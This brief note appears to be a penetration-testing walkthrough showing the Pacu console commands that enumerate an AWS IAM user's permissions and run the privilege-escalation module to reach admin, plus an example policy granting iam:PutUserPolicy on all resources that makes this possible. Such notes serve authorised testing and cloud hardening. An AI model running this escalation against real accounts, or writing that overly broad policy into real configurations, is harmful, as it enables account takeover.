Pacu. iam__privesc_scan
2019-10-15 23:24:33
From user to admin with pacu
pacu> whoami
pacu> run iam__enum_permissions
pacu> whoami
pacu> run iam__privesc_scan --scan-only
pacu> run iam__privesc_scan
pacu> run iam__enum_permissions
pacu> whoami
User name
Test
Example user policy
that can be use by pacu to gain admin access
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "iam:PutUserPolicy",
"Resource": "*"
}
]
}